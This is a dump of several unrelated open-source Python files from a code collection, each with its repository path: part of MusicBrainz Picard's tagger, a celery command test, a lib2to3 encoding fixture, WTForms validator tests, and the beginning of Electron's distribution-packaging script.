        if filename not in self.files:
            file = open_file(filename)
            if file:
                self.files[filename] = file
                new_files.append(file)
    if new_files:
        log.debug("Adding files %r", new_files)
        new_files.sort(key=lambda x: x.filename)
        if target is None or target is self.unmatched_files:
            self.unmatched_files.add_files(new_files)
            target = None
        for file in new_files:
            file.load(partial(self._file_loaded, target=target))
def add_directory(self, path):
    """Add a directory of files, recursively when so configured."""
    if config.setting['recursively_add_files']:
        self._add_directory_recursive(path)
    else:
        self._add_directory_non_recursive(path)
def _add_directory_recursive(self, path):
    """Walk `path` on a worker thread, adding one directory per task."""
    ignore_hidden = config.setting["ignore_hidden_files"]
    walk = os.walk(unicode(path))

    def get_files():
        # Advance the walker by one directory; None signals completion.
        try:
            root, dirs, files = next(walk)
            if ignore_hidden:
                # Prune hidden subdirectories in place so walk skips them.
                dirs[:] = [d for d in dirs if not is_hidden(os.path.join(root, d))]
        except StopIteration:
            return None
        else:
            number_of_files = len(files)
            if number_of_files:
                mparms = {
                    'count': number_of_files,
                    'directory': root,
                }
                log.debug("Adding %(count)d files from '%(directory)r'" %
                          mparms)
                self.window.set_statusbar_message(
                    ungettext(
                        "Adding %(count)d file from '%(directory)s' ...",
                        "Adding %(count)d files from '%(directory)s' ...",
                        number_of_files),
                    mparms,
                    translate=None,
                    echo=None
                )
            return (os.path.join(root, f) for f in files)

    def process(result=None, error=None):
        # Each completed task schedules the next one until the walk ends.
        if result:
            if error is None:
                self.add_files(result)
            thread.run_task(get_files, process)
    # Prime the loop with a dummy successful result (error is not None,
    # so no files are added on this first call).
    process(True, False)
def _add_directory_non_recursive(self, path):
    """Add only the files directly inside `path` (no subdirectories)."""
    files = []
    for f in os.listdir(path):
        listing = os.path.join(path, f)
        if os.path.isfile(listing):
            files.append(listing)
    number_of_files = len(files)
    if number_of_files:
        mparms = {
            'count': number_of_files,
            'directory': path,
        }
        log.debug("Adding %(count)d files from '%(directory)r'" %
                  mparms)
        self.window.set_statusbar_message(
            ungettext(
                "Adding %(count)d file from '%(directory)s' ...",
                "Adding %(count)d files from '%(directory)s' ...",
                number_of_files),
            mparms,
            translate=None,
            echo=None
        )
        # Function call only if files exist
        self.add_files(files)
def get_file_lookup(self):
    """Return a FileLookup object."""
    # Bound to the configured server and the local browser-integration port.
    return FileLookup(self, config.setting["server_host"],
                      config.setting["server_port"],
                      self.browser_integration.port)
def copy_files(self, objects):
    """Put the objects' file URLs on the system clipboard."""
    mimeData = QtCore.QMimeData()
    mimeData.setUrls([QtCore.QUrl.fromLocalFile(f.filename) for f in (self.get_files_from_objects(objects))])
    self.clipboard().setMimeData(mimeData)
def paste_files(self, target):
    """Add files from clipboard URLs, dropping them onto `target`."""
    mimeData = self.clipboard().mimeData()
    if mimeData.hasUrls():
        BaseTreeView.drop_urls(mimeData.urls(), target)
def search(self, text, type, adv=False):
    """Search on the MusicBrainz website.

    `type` is "track", "album" or "artist"; `adv` selects advanced
    query syntax for the website search.  With builtin search enabled,
    `text` is first tried as a direct MBID lookup and a search dialog
    is shown when that fails.
    """
    # NOTE(review): the parameter name `type` shadows the builtin but is
    # part of the public signature (keyword callers); left unchanged.
    lookup = self.get_file_lookup()
    if config.setting["builtin_search"]:
        if type == "track" and not lookup.mbidLookup(text, 'recording'):
            dialog = TrackSearchDialog(self.window)
            dialog.search(text)
            dialog.exec_()
        elif type == "album" and not lookup.mbidLookup(text, 'release'):
            dialog = AlbumSearchDialog(self.window)
            dialog.search(text)
            dialog.exec_()
        elif type == "artist" and not lookup.mbidLookup(text, 'artist'):
            dialog = ArtistSearchDialog(self.window)
            dialog.search(text)
            dialog.exec_()
    else:
        getattr(lookup, type + "Search")(text, adv)
def collection_lookup(self):
    """Lookup the users collections on the MusicBrainz website."""
    lookup = self.get_file_lookup()
    lookup.collectionLookup(config.persist["oauth_username"])
def browser_lookup(self, item):
    """Lookup the object's metadata on the MusicBrainz website."""
    lookup = self.get_file_lookup()
    metadata = item.metadata
    # Only lookup via MB IDs if matched to a DataObject; otherwise ignore and use metadata details
    if isinstance(item, DataObject):
        itemid = item.id
        if isinstance(item, Track):
            lookup.recordingLookup(itemid)
        elif isinstance(item, Album):
            lookup.albumLookup(itemid)
    else:
        # Unmatched item: fall back to a free-text tag lookup.
        lookup.tagLookup(
            metadata["albumartist"] if item.is_album_like() else metadata["artist"],
            metadata["album"],
            metadata["title"],
            metadata["tracknumber"],
            '' if item.is_album_like() else str(metadata.length),
            item.filename if isinstance(item, File) else '')
def get_files_from_objects(self, objects, save=False):
    """Return list of files from list of albums, clusters, tracks or files."""
    per_object = (obj.iterfiles(save) for obj in objects)
    return uniqify(chain.from_iterable(per_object))
def save(self, objects):
    """Save the specified objects."""
    for pending in self.get_files_from_objects(objects, save=True):
        pending.save()
def load_album(self, id, discid=None):
    """Return the album for `id`, starting a load if it is not cached."""
    # Follow any known MBID redirect before the cache lookup.
    id = self.mbid_redirects.get(id, id)
    album = self.albums.get(id)
    if album:
        log.debug("Album %s already loaded.", id)
        return album
    album = Album(id, discid=discid)
    self.albums[id] = album
    self.album_added.emit(album)
    album.load()
    return album
def load_nat(self, id, node=None):
    """Return the non-album track for `id`, creating/loading it if needed."""
    self.create_nats()
    nat = self.get_nat_by_id(id)
    if nat:
        log.debug("NAT %s already loaded.", id)
        return nat
    nat = NonAlbumTrack(id)
    self.nats.tracks.append(nat)
    self.nats.update(True)
    if node:
        # Recording data already fetched: parse it directly.
        nat._parse_recording(node)
    else:
        nat.load()
    return nat
def get_nat_by_id(self, id):
    """Return the loaded non-album track with MBID `id`, or None."""
    if self.nats is None:
        return None
    return next((track for track in self.nats.tracks if track.id == id), None)
def get_release_group_by_id(self, id):
    """Return the cached ReleaseGroup for `id`, creating one if absent."""
    # NOTE(review): setdefault builds a ReleaseGroup even on a cache hit;
    # presumably the constructor is cheap and side-effect free -- confirm.
    return self.release_groups.setdefault(id, ReleaseGroup(id))
def remove_files(self, files, from_parent=True):
    """Remove files from the tagger."""
    for file in files:
        if file.filename in self.files:
            # Cancel any in-flight work before dropping the file.
            file.clear_lookup_task()
            self._acoustid.stop_analyze(file)
            del self.files[file.filename]
            file.remove(from_parent)
def remove_album(self, album):
    """Remove the specified album."""
    log.debug("Removing %r", album)
    album.stop_loading()
    self.remove_files(self.get_files_from_objects([album]))
    del self.albums[album.id]
    if album.release_group:
        album.release_group.remove_album(album.id)
    if album == self.nats:
        # The NAT pseudo-album was removed; forget it.
        self.nats = None
    self.album_removed.emit(album)
def remove_cluster(self, cluster):
    """Remove the specified cluster."""
    # Special clusters (e.g. unmatched files) are never removed.
    if not cluster.special:
        log.debug("Removing %r", cluster)
        files = list(cluster.files)
        # Detach files first so removal doesn't mutate the cluster mid-loop.
        cluster.files = []
        cluster.clear_lookup_task()
        self.remove_files(files, from_parent=False)
        self.clusters.remove(cluster)
        self.cluster_removed.emit(cluster)
def remove(self, objects):
    """Remove the specified objects."""
    files = []
    for obj in objects:
        if isinstance(obj, File):
            files.append(obj)
        elif isinstance(obj, Track):
            files.extend(obj.linked_files)
        elif isinstance(obj, Album):
            self.window.set_statusbar_message(
                N_("Removing album %(id)s: %(artist)s - %(album)s"),
                {
                    'id': obj.id,
                    'artist': obj.metadata['albumartist'],
                    'album': obj.metadata['album']
                }
            )
            self.remove_album(obj)
        elif isinstance(obj, Cluster):
            self.remove_cluster(obj)
    if files:
        # Loose files are removed in one batch at the end.
        self.remove_files(files)
def _lookup_disc(self, disc, result=None, error=None):
    """Callback after a CD read: report errors or start the DiscID lookup."""
    self.restore_cursor()
    if error is not None:
        QtGui.QMessageBox.critical(self.window, _(u"CD Lookup Error"),
                                   _(u"Error while reading CD:\n\n%s") % error)
    else:
        disc.lookup()
def lookup_cd(self, action):
    """Reads CD from the selected drive and tries to lookup the DiscID on MusicBrainz."""
    if isinstance(action, QtGui.QAction):
        # Invoked from the drive menu: the action text is the device name.
        device = unicode(action.text())
    elif config.setting["cd_lookup_device"] != '':
        # Multiple configured devices are comma-separated; use the first.
        device = config.setting["cd_lookup_device"].split(",", 1)[0]
    else:
        # rely on python-discid auto detection
        device = None
    disc = Disc()
    self.set_wait_cursor()
    thread.run_task(
        partial(disc.read, encode_filename(device)),
        partial(self._lookup_disc, disc))
@property
def use_acoustid(self):
    """True when AcoustID is the configured fingerprinting system."""
    return config.setting["fingerprinting_system"] == "acoustid"
def analyze(self, objs):
    """Analyze the file(s)."""
    files = self.get_files_from_objects(objs)
    for file in files:
        # NOTE(review): files are marked pending even when AcoustID is not
        # the configured backend -- presumably intentional; confirm.
        file.set_pending()
        if self.use_acoustid:
            self._acoustid.analyze(file, partial(file._lookup_finished, 'acoustid'))
# =======================================================================
# Metadata-based lookups
# =======================================================================
def autotag(self, objects):
    """Trigger a metadata lookup for every object that supports it."""
    for candidate in objects:
        if not candidate.can_autotag():
            continue
        candidate.lookup_metadata()
# =======================================================================
# Clusters
# =======================================================================
def cluster(self, objs):
    """Group files with similar metadata to 'clusters'."""
    log.debug("Clustering %r", objs)
    if len(objs) <= 1 or self.unmatched_files in objs:
        # Nothing (or only unmatched) selected: cluster all unmatched files.
        files = list(self.unmatched_files.files)
    else:
        files = self.get_files_from_objects(objs)
    # Python 2 comparison function: disc, then track, then filename.
    fcmp = lambda a, b: (
        cmp(a.discnumber, b.discnumber) or
        cmp(a.tracknumber, b.tracknumber) or
        cmp(a.base_filename, b.base_filename))
    for name, artist, files in Cluster.cluster(files, 1.0):
        # Keep the UI responsive while clustering.
        QtCore.QCoreApplication.processEvents()
        cluster = self.load_cluster(name, artist)
        # Python 2 sorted() accepts the cmp function positionally.
        for file in sorted(files, fcmp):
            file.move(cluster)
def load_cluster(self, name, artist):
    """Return the cluster for (album `name`, `artist`), creating it if new."""
    for cluster in self.clusters:
        cm = cluster.metadata
        if name == cm["album"] and artist == cm["albumartist"]:
            return cluster
    cluster = Cluster(name, artist)
    self.clusters.append(cluster)
    self.cluster_added.emit(cluster)
    return cluster
# =======================================================================
# Utils
# =======================================================================
def set_wait_cursor(self):
    """Sets the waiting cursor."""
    # Application-wide override; must be paired with restore_cursor().
    QtGui.QApplication.setOverrideCursor(
        QtGui.QCursor(QtCore.Qt.WaitCursor))
def restore_cursor(self):
    """Restores the cursor set by ``set_wait_cursor``."""
    QtGui.QApplication.restoreOverrideCursor()
def refresh(self, objs):
    """Reload metadata, at high priority, for each refreshable object."""
    refreshable = (obj for obj in objs if obj.can_refresh())
    for obj in refreshable:
        obj.load(priority=True, refresh=True)
def bring_tagger_front(self):
    """Raise, focus and un-minimize the main window."""
    # Clear the minimized bit while setting the active bit.
    self.window.setWindowState(self.window.windowState() & ~QtCore.Qt.WindowMinimized | QtCore.Qt.WindowActive)
    self.window.raise_()
    self.window.activateWindow()
@classmethod
def instance(cls):
    """Return the singleton Tagger instance."""
    # NOTE(review): relies on the name-mangled __instance attribute being
    # assigned elsewhere in the class (not visible in this chunk).
    return cls.__instance
def signal(self, signum, frame):
    """OS signal handler: forward the signal into the Qt event loop."""
    log.debug("signal %i received", signum)
    # Send a notification about a received signal from the signal handler
    # to Qt.
    self.signalfd[0].sendall("a")
def sighandler(self):
    """Qt-side handler for forwarded OS signals: shut the application down."""
    # Disable the notifier while handling to avoid re-entrant delivery.
    self.signalnotifier.setEnabled(False)
    self.exit()
    self.quit()
    self.signalnotifier.setEnabled(True)
def version():
    """Print the short version banner."""
    print("%s %s %s" % (PICARD_ORG_NAME, PICARD_APP_NAME, PICARD_FANCY_VERSION_STR))
def longversion():
    """Print the full version report for all bundled components."""
    print(versions.as_string())
def process_picard_args():
    """Parse Picard's own command-line options.

    Returns (picard_args, unparsed_args); options Picard does not
    recognise are returned unparsed for the caller to forward.
    """
    parser = argparse.ArgumentParser(
        epilog="If one of the filenames begins with a hyphen, use -- to separate the options from the filenames."
    )
    parser.add_argument("-d", "--debug", action='store_true',
                        help="enable debug-level logging")
    parser.add_argument('-v', '--version', action='store_true',
                        help="display version information and exit")
    parser.add_argument("-V", "--long-version", action='store_true',
                        help="display long version information and exit")
    parser.add_argument('FILE', nargs='*')
    picard_args, unparsed_args = parser.parse_known_args()
    return picard_args, unparsed_args
def main(localedir=None, autoupdate=True):
    """Application entry point: parse arguments and start the Tagger."""
    # Some libs (ie. Phonon) require those to be set
    QtGui.QApplication.setApplicationName(PICARD_APP_NAME)
    QtGui.QApplication.setOrganizationName(PICARD_ORG_NAME)
    # Let Ctrl+C terminate the process with the default handler.
    signal.signal(signal.SIGINT, signal.SIG_DFL)
    picard_args, unparsed_args = process_picard_args()
    if picard_args.version:
        return version()
    if picard_args.long_version:
        return longversion()
    tagger = Tagger(picard_args, unparsed_args, localedir, autoupdate)
    # NOTE(review): the 1s timer presumably keeps the interpreter ticking
    # so Python-level signal handlers get a chance to run -- confirm.
    tagger.startTimer(1000)
    sys.exit(tagger.run())
|
akarki15/mozillians | refs/heads/master | vendor-local/lib/python/celery/tests/test_bin/test_celeryev.py | 14 | from __future__ import absolute_import
from nose import SkipTest
from celery.app import app_or_default
from celery.bin import celeryev
from celery.tests.utils import Case, patch
class MockCommand(object):
    """Test double recording execute_from_commandline() invocations."""
    # Class-level record shared by all instances; reset by the tests.
    executed = []

    def execute_from_commandline(self, **kwargs):
        self.executed.append(True)
def proctitle(prog, info=None):
    """Fake set_process_title(): records the last call on the function object."""
    proctitle.last = (prog, info)
# Initialize the record so tests can read it before any call.
proctitle.last = ()
class test_EvCommand(Case):
    """Tests for the ``celeryev`` command-line entry point."""

    def setUp(self):
        self.app = app_or_default()
        self.ev = celeryev.EvCommand(app=self.app)

    @patch("celery.events.dumper", "evdump", lambda **kw: "me dumper, you?")
    @patch("celery.platforms", "set_process_title", proctitle)
    def test_run_dump(self):
        self.assertEqual(self.ev.run(dump=True), "me dumper, you?")
        self.assertIn("celeryev:dump", proctitle.last[0])

    def test_run_top(self):
        try:
            import curses  # noqa
        except ImportError:
            raise SkipTest("curses monitor requires curses")

        # Patching is deferred to an inner function so the decorators only
        # apply once curses is known to be importable.
        @patch("celery.events.cursesmon", "evtop", lambda **kw: "me top, you?")
        @patch("celery.platforms", "set_process_title", proctitle)
        def _inner():
            self.assertEqual(self.ev.run(), "me top, you?")
            self.assertIn("celeryev:top", proctitle.last[0])

        return _inner()

    @patch("celery.events.snapshot", "evcam", lambda *a, **k: (a, k))
    @patch("celery.platforms", "set_process_title", proctitle)
    def test_run_cam(self):
        # The patched evcam echoes its (args, kwargs) back for inspection.
        a, kw = self.ev.run(camera="foo.bar.baz", logfile="logfile")
        self.assertEqual(a[0], "foo.bar.baz")
        self.assertEqual(kw["freq"], 1.0)
        self.assertIsNone(kw["maxrate"])
        self.assertEqual(kw["loglevel"], "INFO")
        self.assertEqual(kw["logfile"], "logfile")
        self.assertIn("celeryev:cam", proctitle.last[0])

    @patch("celery.bin.celeryev", "EvCommand", MockCommand)
    def test_main(self):
        MockCommand.executed = []
        celeryev.main()
        self.assertTrue(MockCommand.executed)
|
hynnet/hiwifi-openwrt-HC5661-HC5761 | refs/heads/master | staging_dir/host/lib/python2.7/lib2to3/tests/data/different_encoding.py | 295 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
print u'ßàáâãäåæçèéêëìíîïðñòóôõöøùúûüýþÿÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖØÙÚÛÜÝÞ'
def f(x):
    # NOTE(review): lib2to3 test fixture -- the Python 2 print statement and
    # non-ASCII text are intentional input data; keep this file otherwise exact.
    print '%s\t-> α(%2i):%s β(%s)'
|
mabushadi/dpxdt | refs/heads/master | dependencies/WTForms/tests/validators.py | 2 | #!/usr/bin/env python
from unittest import TestCase
from wtforms.compat import text_type
from wtforms.validators import (
StopValidation, ValidationError, email, equal_to,
ip_address, length, required, optional, regexp,
url, NumberRange, AnyOf, NoneOf, mac_address, UUID
)
from functools import partial
class DummyTranslations(object):
    """No-op translation backend: returns the message text unchanged."""

    def gettext(self, string):
        return string

    def ngettext(self, singular, plural, n):
        return singular if n == 1 else plural
class DummyForm(dict):
    """Minimal form stand-in: validators only need mapping access."""
    pass
class DummyField(object):
    """Minimal WTForms-field stand-in exposing just what validators use."""
    # All fields share one pass-through translation backend.
    _translations = DummyTranslations()

    def __init__(self, data, errors=(), raw_data=None):
        self.data = data
        self.errors = list(errors)
        self.raw_data = raw_data

    def gettext(self, string):
        return self._translations.gettext(string)

    def ngettext(self, singular, plural, n):
        return self._translations.ngettext(singular, plural, n)
def grab_error_message(callable, form, field):
    """Run a validator and return the message of the ValidationError it raises.

    Returns None implicitly when no error is raised.
    """
    try:
        callable(form, field)
    except ValidationError as e:
        return e.args[0]
class ValidatorsTest(TestCase):
    """Unit tests for the stock WTForms validators."""

    def setUp(self):
        self.form = DummyForm()

    def test_email(self):
        self.assertEqual(email()(self.form, DummyField('foo@bar.dk')), None)
        self.assertEqual(email()(self.form, DummyField('123@bar.dk')), None)
        self.assertEqual(email()(self.form, DummyField('foo@456.dk')), None)
        self.assertEqual(email()(self.form, DummyField('foo@bar456.info')), None)
        self.assertRaises(ValidationError, email(), self.form, DummyField(None))
        self.assertRaises(ValidationError, email(), self.form, DummyField(''))
        self.assertRaises(ValidationError, email(), self.form, DummyField(' '))
        self.assertRaises(ValidationError, email(), self.form, DummyField('foo'))
        self.assertRaises(ValidationError, email(), self.form, DummyField('bar.dk'))
        self.assertRaises(ValidationError, email(), self.form, DummyField('foo@'))
        self.assertRaises(ValidationError, email(), self.form, DummyField('@bar.dk'))
        self.assertRaises(ValidationError, email(), self.form, DummyField('foo@bar'))
        self.assertRaises(ValidationError, email(), self.form, DummyField('foo@bar.ab12'))
        self.assertRaises(ValidationError, email(), self.form, DummyField('foo@.bar.ab'))

    def test_equal_to(self):
        self.form['foo'] = DummyField('test')
        self.assertEqual(equal_to('foo')(self.form, self.form['foo']), None)
        self.assertRaises(ValidationError, equal_to('invalid_field_name'), self.form, DummyField('test'))
        self.assertRaises(ValidationError, equal_to('foo'), self.form, DummyField('different_value'))

    def test_ip_address(self):
        self.assertEqual(ip_address()(self.form, DummyField('127.0.0.1')), None)
        self.assertRaises(ValidationError, ip_address(), self.form, DummyField('abc.0.0.1'))
        self.assertRaises(ValidationError, ip_address(), self.form, DummyField('1278.0.0.1'))
        self.assertRaises(ValidationError, ip_address(), self.form, DummyField('127.0.0.abc'))
        self.assertRaises(ValidationError, ip_address(), self.form, DummyField('900.200.100.75'))
        self.assertRaises(ValidationError, ip_address(ipv6=True), self.form, DummyField('abc.0.0.1'))
        self.assertRaises(ValidationError, ip_address(ipv6=True), self.form, DummyField('abcd:1234::123::1'))
        for good_address in ('::1', 'dead:beef:0:0:0:0:42:1', 'abcd:ef::42:1'):
            self.assertEqual(ip_address(ipv6=True)(self.form, DummyField(good_address)), None)

    def test_mac_address(self):
        self.assertEqual(mac_address()(self.form,
                                       DummyField('01:23:45:67:ab:CD')), None)
        check_fail = partial(
            self.assertRaises, ValidationError,
            mac_address(), self.form
        )
        check_fail(DummyField('00:00:00:00:00'))
        check_fail(DummyField('01:23:45:67:89:'))
        check_fail(DummyField('01:23:45:67:89:gh'))
        check_fail(DummyField('123:23:45:67:89:00'))

    def test_uuid(self):
        self.assertEqual(UUID()(self.form, DummyField(
            '2bc1c94f-0deb-43e9-92a1-4775189ec9f8')), None)
        self.assertRaises(ValidationError, UUID(), self.form,
                          DummyField('2bc1c94f-deb-43e9-92a1-4775189ec9f8'))
        self.assertRaises(ValidationError, UUID(), self.form,
                          DummyField('2bc1c94f-0deb-43e9-92a1-4775189ec9f'))
        self.assertRaises(ValidationError, UUID(), self.form,
                          DummyField('gbc1c94f-0deb-43e9-92a1-4775189ec9f8'))
        self.assertRaises(ValidationError, UUID(), self.form,
                          DummyField('2bc1c94f 0deb-43e9-92a1-4775189ec9f8'))

    def test_length(self):
        field = DummyField('foobar')
        self.assertEqual(length(min=2, max=6)(self.form, field), None)
        self.assertRaises(ValidationError, length(min=7), self.form, field)
        self.assertEqual(length(min=6)(self.form, field), None)
        self.assertRaises(ValidationError, length(max=5), self.form, field)
        self.assertEqual(length(max=6)(self.form, field), None)
        # No bounds, or inverted bounds, are programming errors.
        self.assertRaises(AssertionError, length)
        self.assertRaises(AssertionError, length, min=5, max=2)
        # Test new formatting features
        grab = lambda **k : grab_error_message(length(**k), self.form, field)
        self.assertEqual(grab(min=2, max=5, message='%(min)d and %(max)d'), '2 and 5')
        self.assertTrue('at least 8' in grab(min=8))
        self.assertTrue('longer than 5' in grab(max=5))
        self.assertTrue('between 2 and 5' in grab(min=2, max=5))

    def test_required(self):
        self.assertEqual(required()(self.form, DummyField('foobar')), None)
        self.assertRaises(StopValidation, required(), self.form, DummyField(''))
        self.assertRaises(StopValidation, required(), self.form, DummyField(' '))
        self.assertEqual(required().field_flags, ('required', ))
        f = DummyField('', ['Invalid Integer Value'])
        self.assertEqual(len(f.errors), 1)
        self.assertRaises(StopValidation, required(), self.form, f)
        # Stopping validation is expected to clear accumulated errors.
        self.assertEqual(len(f.errors), 0)

    def test_optional(self):
        self.assertEqual(optional()(self.form, DummyField('foobar', raw_data=['foobar'])), None)
        self.assertRaises(StopValidation, optional(), self.form, DummyField('', raw_data=['']))
        self.assertEqual(optional().field_flags, ('optional', ))
        f = DummyField('', ['Invalid Integer Value'], raw_data=[''])
        self.assertEqual(len(f.errors), 1)
        self.assertRaises(StopValidation, optional(), self.form, f)
        self.assertEqual(len(f.errors), 0)
        # Test for whitespace behavior.
        whitespace_field = DummyField(' ', raw_data=[' '])
        self.assertRaises(StopValidation, optional(), self.form, whitespace_field)
        self.assertEqual(optional(strip_whitespace=False)(self.form, whitespace_field), None)

    def test_regexp(self):
        import re
        # String regexp
        self.assertEqual(regexp('^a')(self.form, DummyField('abcd')), None)
        self.assertEqual(regexp('^a', re.I)(self.form, DummyField('ABcd')), None)
        self.assertRaises(ValidationError, regexp('^a'), self.form, DummyField('foo'))
        self.assertRaises(ValidationError, regexp('^a'), self.form, DummyField(None))
        # Compiled regexp
        self.assertEqual(regexp(re.compile('^a'))(self.form, DummyField('abcd')), None)
        self.assertEqual(regexp(re.compile('^a', re.I))(self.form, DummyField('ABcd')), None)
        self.assertRaises(ValidationError, regexp(re.compile('^a')), self.form, DummyField('foo'))
        self.assertRaises(ValidationError, regexp(re.compile('^a')), self.form, DummyField(None))

    def test_url(self):
        self.assertEqual(url()(self.form, DummyField('http://foobar.dk')), None)
        self.assertEqual(url()(self.form, DummyField('http://foobar.dk/')), None)
        self.assertEqual(url()(self.form, DummyField('http://foobar.museum/foobar')), None)
        self.assertEqual(url()(self.form, DummyField('http://127.0.0.1/foobar')), None)
        self.assertEqual(url()(self.form, DummyField('http://127.0.0.1:9000/fake')), None)
        self.assertEqual(url(require_tld=False)(self.form, DummyField('http://localhost/foobar')), None)
        self.assertEqual(url(require_tld=False)(self.form, DummyField('http://foobar')), None)
        self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar'))
        self.assertRaises(ValidationError, url(), self.form, DummyField('foobar.dk'))
        self.assertRaises(ValidationError, url(), self.form, DummyField('http://127.0.0/asdf'))
        self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar.d'))
        self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar.12'))
        self.assertRaises(ValidationError, url(), self.form, DummyField('http://localhost:abc/a'))

    def test_number_range(self):
        v = NumberRange(min=5, max=10)
        self.assertEqual(v(self.form, DummyField(7)), None)
        self.assertRaises(ValidationError, v, self.form, DummyField(None))
        self.assertRaises(ValidationError, v, self.form, DummyField(0))
        self.assertRaises(ValidationError, v, self.form, DummyField(12))
        self.assertRaises(ValidationError, v, self.form, DummyField(-5))
        onlymin = NumberRange(min=5)
        self.assertEqual(onlymin(self.form, DummyField(500)), None)
        self.assertRaises(ValidationError, onlymin, self.form, DummyField(4))
        onlymax = NumberRange(max=50)
        self.assertEqual(onlymax(self.form, DummyField(30)), None)
        self.assertRaises(ValidationError, onlymax, self.form, DummyField(75))

    def test_lazy_proxy(self):
        """Tests that the validators support lazy translation strings for messages."""
        class ReallyLazyProxy(object):
            def __unicode__(self):
                raise Exception('Translator function called during form declaration: it should be called at response time.')
            __str__ = __unicode__

        message = ReallyLazyProxy()
        self.assertRaises(Exception, str, message)
        self.assertRaises(Exception, text_type, message)
        # Constructing validators must not stringify the lazy message.
        self.assertTrue(equal_to('fieldname', message=message))
        self.assertTrue(length(min=1, message=message))
        self.assertTrue(NumberRange(1,5, message=message))
        self.assertTrue(required(message=message))
        self.assertTrue(regexp('.+', message=message))
        self.assertTrue(email(message=message))
        self.assertTrue(ip_address(message=message))
        self.assertTrue(url(message=message))

    def test_any_of(self):
        self.assertEqual(AnyOf(['a', 'b', 'c'])(self.form, DummyField('b')), None)
        self.assertRaises(ValueError, AnyOf(['a', 'b', 'c']), self.form, DummyField(None))
        # Anyof in 1.0.1 failed on numbers for formatting the error with a TypeError
        check_num = AnyOf([1,2,3])
        self.assertEqual(check_num(self.form, DummyField(2)), None)
        self.assertRaises(ValueError, check_num, self.form, DummyField(4))
        # Test values_formatter
        formatter = lambda values: '::'.join(text_type(x) for x in reversed(values))
        checker = AnyOf([7,8,9], message='test %(values)s', values_formatter=formatter)
        self.assertEqual(grab_error_message(checker, self.form, DummyField(4)), 'test 9::8::7')

    def test_none_of(self):
        self.assertEqual(NoneOf(['a', 'b', 'c'])(self.form, DummyField('d')), None)
        self.assertRaises(ValueError, NoneOf(['a', 'b', 'c']), self.form, DummyField('a'))
# Allow running this test module directly.
if __name__ == '__main__':
    from unittest import main
    main()
|
pandoraui/electron | refs/heads/master | script/create-dist.py | 34 | #!/usr/bin/env python
import os
import re
import shutil
import subprocess
import sys
import stat
from lib.config import LIBCHROMIUMCONTENT_COMMIT, BASE_URL, PLATFORM, \
get_target_arch, get_chromedriver_version
from lib.util import scoped_cwd, rm_rf, get_atom_shell_version, make_zip, \
execute, atom_gyp
# Build metadata and directory layout derived from the source tree.
ATOM_SHELL_VERSION = get_atom_shell_version()
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
DIST_DIR = os.path.join(SOURCE_ROOT, 'dist')
OUT_DIR = os.path.join(SOURCE_ROOT, 'out', 'R')
CHROMIUM_DIR = os.path.join(SOURCE_ROOT, 'vendor', 'brightray', 'vendor',
                            'download', 'libchromiumcontent', 'static_library')

# Project/product names come from the gyp configuration.
PROJECT_NAME = atom_gyp()['project_name%']
PRODUCT_NAME = atom_gyp()['product_name%']

# Binaries to ship, keyed by platform.
TARGET_BINARIES = {
    'darwin': [
    ],
    'win32': [
        '{0}.exe'.format(PROJECT_NAME),  # 'electron.exe'
        'content_shell.pak',
        'd3dcompiler_47.dll',
        'ffmpegsumo.dll',
        'icudtl.dat',
        'libEGL.dll',
        'libGLESv2.dll',
        'msvcp120.dll',
        'msvcr120.dll',
        'node.dll',
        'pdf.dll',
        'content_resources_200_percent.pak',
        'ui_resources_200_percent.pak',
        'xinput1_3.dll',
        'natives_blob.bin',
        'snapshot_blob.bin',
        'vccorlib120.dll',
    ],
    'linux': [
        PROJECT_NAME,  # 'electron'
        'content_shell.pak',
        'icudtl.dat',
        'libffmpegsumo.so',
        'libnode.so',
        'natives_blob.bin',
        'snapshot_blob.bin',
    ],
}
# Directories to ship, keyed by platform.
TARGET_DIRECTORIES = {
    'darwin': [
        '{0}.app'.format(PRODUCT_NAME),
    ],
    'win32': [
        'resources',
        'locales',
    ],
    'linux': [
        'resources',
        'locales',
    ],
}
# Name prefixes of system libraries to bundle on Linux; entries are
# replaced with the resolved (versioned) names by copy_system_libraries().
SYSTEM_LIBRARIES = [
    'libgcrypt.so',
    'libnotify.so',
]
def main():
    """Build Electron and assemble all distribution zip archives."""
    rm_rf(DIST_DIR)
    os.makedirs(DIST_DIR)
    target_arch = get_target_arch()
    force_build()
    create_symbols()
    copy_binaries()
    copy_chrome_binary('chromedriver')
    copy_chrome_binary('mksnapshot')
    copy_license()
    if PLATFORM == 'linux':
        strip_binaries()
        if target_arch != 'arm':
            # NOTE(review): system libraries are skipped on ARM --
            # presumably cross-built; confirm.
            copy_system_libraries()
    create_version()
    create_dist_zip()
    create_chrome_binary_zip('chromedriver', get_chromedriver_version())
    create_chrome_binary_zip('mksnapshot', ATOM_SHELL_VERSION)
    create_symbols_zip()
def force_build():
    """Run a full Release build before packaging."""
    build = os.path.join(SOURCE_ROOT, 'script', 'build.py')
    execute([sys.executable, build, '-c', 'Release'])
def copy_binaries():
    """Copy per-platform binaries and resource directories into DIST_DIR."""
    for binary in TARGET_BINARIES[PLATFORM]:
        shutil.copy2(os.path.join(OUT_DIR, binary), DIST_DIR)
    for directory in TARGET_DIRECTORIES[PLATFORM]:
        shutil.copytree(os.path.join(OUT_DIR, directory),
                        os.path.join(DIST_DIR, directory),
                        symlinks=True)
def copy_chrome_binary(binary):
    """Copy a Chromium helper binary into DIST_DIR, keeping it executable."""
    if PLATFORM == 'win32':
        binary += '.exe'
    src = os.path.join(CHROMIUM_DIR, binary)
    dest = os.path.join(DIST_DIR, binary)
    # Copy file and keep the executable bit.
    shutil.copyfile(src, dest)
    os.chmod(dest, os.stat(dest).st_mode | stat.S_IEXEC)
def copy_license():
    """Copy the LICENSE file into the distribution directory."""
    shutil.copy2(os.path.join(SOURCE_ROOT, 'LICENSE'), DIST_DIR)
def strip_binaries():
    """Strip debug symbols from Linux executables and shared libraries."""
    if get_target_arch() == 'arm':
        # Cross-toolchain strip for ARM builds.
        strip = 'arm-linux-gnueabihf-strip'
    else:
        strip = 'strip'
    for binary in TARGET_BINARIES[PLATFORM]:
        # Shared objects, plus extensionless files (the executables).
        if binary.endswith('.so') or '.' not in binary:
            execute([strip, os.path.join(DIST_DIR, binary)])
def copy_system_libraries():
